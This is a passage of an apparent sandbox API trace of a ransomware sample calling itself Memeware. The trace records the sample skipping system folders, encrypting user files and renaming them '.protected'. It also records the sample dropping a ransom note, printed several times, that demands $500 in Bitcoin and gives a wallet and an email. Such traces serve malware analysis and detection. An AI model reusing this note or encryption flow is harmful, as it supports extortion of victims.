\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.142] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.143] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.143] WriteFile (in: hFile=0x150, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.143] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.143] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.143] CloseHandle (hObject=0x150) returned 1 [0085.143] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Windows") returned -1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Program Files") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="Program Files (x86)") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="$Recycle.bin") returned 1 [0085.143] lstrcmpiW (lpString1="User", lpString2="System Volume Information") returned 1 [0085.144] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User") returned 76 [0085.144] lstrcmpW (lpString1="User", lpString2=".") returned 1 [0085.144] lstrcmpW (lpString1="User", lpString2="..") returned 1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*") returned 78 [0085.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0085.144] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.144] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.144] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\.") returned 78 [0085.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.144] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.144] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.144] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\..") returned 79 [0085.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.144] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.144] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.145] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\RESTORE_FILES.txt") returned 94 [0085.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\user\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.145] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.145] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.146] lstrlenA (lpString="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") returned 684 [0085.146] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.146] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.146] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.147] CloseHandle (hObject=0x150) returned 1 [0085.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.147] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.147] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RESTORE_FILES.txt") returned 89 [0085.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.148] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.148] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.149] lstrlenA (lpString="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") returned 684 [0085.149] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0085.149] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.149] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.149] CloseHandle (hObject=0x14c) returned 1 [0085.150] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Windows") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Program Files") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="Program Files (x86)") returned -1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="$Recycle.bin") returned 1 [0085.150] lstrcmpiW (lpString1="ONetConfig", lpString2="System Volume Information") returned -1 [0085.150] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig") returned 75 [0085.150] lstrcmpW (lpString1="ONetConfig", lpString2=".") returned 1 [0085.150] lstrcmpW (lpString1="ONetConfig", lpString2="..") returned 1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*") returned 77 [0085.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\.") returned 77 [0085.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.151] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.151] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\..") returned 78 [0085.151] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.151] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Windows") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Program Files") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="Program Files (x86)") returned -1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="$Recycle.bin") returned 1 [0085.151] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="System Volume Information") returned -1 [0085.151] 
wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.151] StrStrIW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".protected") returned 0x0 [0085.152] lstrcmpW (lpString1="350db95df4cbd94b2a1c300510e12e11.sig", lpString2="RESTORE_FILES.txt") returned -1 [0085.152] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.152] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".txt") returned 0x0 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".rar") returned 0x0 [0085.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0085.168] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".zip") 
returned 0x0 [0085.168] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x80, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.169] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x80, lpOverlapped=0x0) returned 1 [0085.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.169] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.170] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.170] CloseHandle (hObject=0x150) returned 1 [0085.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected") returned 122 [0085.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.protected")) returned 1 [0085.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Windows") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Program Files") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="Program Files (x86)") returned -1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="$Recycle.bin") returned 1 [0085.171] lstrcmpiW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="System Volume Information") returned -1 [0085.171] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.171] StrStrIW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".protected") returned 0x0 [0085.171] lstrcmpW (lpString1="350db95df4cbd94b2a1c300510e12e11.xml", lpString2="RESTORE_FILES.txt") returned -1 [0085.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".txt") returned 0x0 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".rar") returned 0x0 [0085.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0085.172] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".zip") returned 0x0 [0085.172] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x7ef, lpOverlapped=0x0) returned 1 [0085.183] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff811, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.183] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7ef, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x7ef, lpOverlapped=0x0) returned 1 [0085.184] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.184] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.184] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.184] CloseHandle (hObject=0x150) returned 1 [0085.185] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected") returned 122 [0085.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml.protected")) returned 1 [0085.198] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.198] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.198] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\RESTORE_FILES.txt") returned 93 [0085.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.199] lstrlenA (lpString="! 
